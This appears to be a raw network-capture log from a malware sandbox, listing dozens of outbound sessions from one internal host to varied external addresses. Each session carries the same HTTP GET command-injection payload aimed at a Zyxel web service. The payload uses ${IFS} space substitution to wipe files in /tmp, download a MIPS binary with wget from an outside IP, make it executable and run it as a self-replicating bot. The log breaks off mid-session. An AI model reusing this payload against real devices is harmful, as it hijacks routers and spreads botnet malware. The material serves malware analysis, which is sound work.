                                      Jan 14, 2024 15:50:06.764729977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5192.168.2.1451542191.71.162.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.764808893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6192.168.2.145219682.162.24.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.764872074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7192.168.2.1450900157.156.123.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.764923096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8192.168.2.1452322122.87.224.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765008926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9192.168.2.143585827.21.125.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765032053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10192.168.2.145970687.176.14.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765096903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192.168.2.1443194166.12.142.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765145063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192.168.2.1434894206.16.237.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765213966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192.168.2.1460932198.224.75.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765263081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192.168.2.1450646132.106.96.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765374899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15192.168.2.14559801.106.86.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765433073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16192.168.2.1442490111.227.8.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765500069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17192.168.2.1449590192.212.193.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765566111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18192.168.2.145120092.236.0.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765602112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19192.168.2.1449296134.130.14.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765685081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20192.168.2.1439308124.138.142.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765727997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21192.168.2.144092667.72.242.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765796900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22192.168.2.1459534208.179.124.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765842915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23192.168.2.144768294.237.78.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.765932083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24192.168.2.144982636.216.221.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766010046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25192.168.2.1452602151.217.110.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766050100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26192.168.2.1442226147.39.138.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766084909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      27192.168.2.145522054.23.74.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766336918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      28192.168.2.143554497.146.81.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766371965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      29192.168.2.144393412.82.3.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766438961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      30192.168.2.145719252.107.133.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766486883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      31192.168.2.144531820.231.200.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766550064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      32192.168.2.1457554139.230.89.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766608953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      33192.168.2.145791035.31.103.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766684055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      34192.168.2.143869297.28.68.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766717911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      35192.168.2.144646478.90.187.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766761065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      36192.168.2.143715070.177.43.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766839981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      37192.168.2.1446244183.215.238.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766901016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      38192.168.2.1448084165.74.17.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766932964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      39192.168.2.1433810145.27.219.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.766999960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      40192.168.2.143341878.155.57.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767060041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      41192.168.2.1439510108.234.178.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767100096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      42192.168.2.145884864.161.241.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767163038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      43192.168.2.1456492162.222.222.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767256021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      44192.168.2.143555674.141.46.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767302036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      45192.168.2.14426302.249.180.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767359018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      46192.168.2.145336842.89.22.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767419100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      47192.168.2.1456204164.144.72.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767488003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      48192.168.2.143983692.243.200.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767538071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      49192.168.2.1457586146.207.23.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767573118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      50192.168.2.1435898186.172.184.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767659903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      51192.168.2.1441578181.50.83.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767714977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      52192.168.2.1448650133.16.82.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767730951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      53192.168.2.1433516122.155.63.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767796040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      54192.168.2.145165254.254.245.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767818928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      55192.168.2.1459300175.254.70.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767896891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      56192.168.2.146069078.244.191.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.767929077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      57192.168.2.1441822186.70.250.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768079996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      58192.168.2.145699458.10.14.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768105984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      59192.168.2.146073680.155.221.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768203020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      60192.168.2.1458732172.138.187.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768224001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      61192.168.2.144401024.81.45.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768294096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      62192.168.2.1455284179.69.219.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768368959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      63192.168.2.143285054.22.5.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768409014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      64192.168.2.1439648206.227.52.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768452883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      65192.168.2.143407895.192.75.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768506050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      66192.168.2.143875847.11.86.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768605947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      67192.168.2.1434638149.197.255.145443
                                      TimestampBytes transferredDirectionData
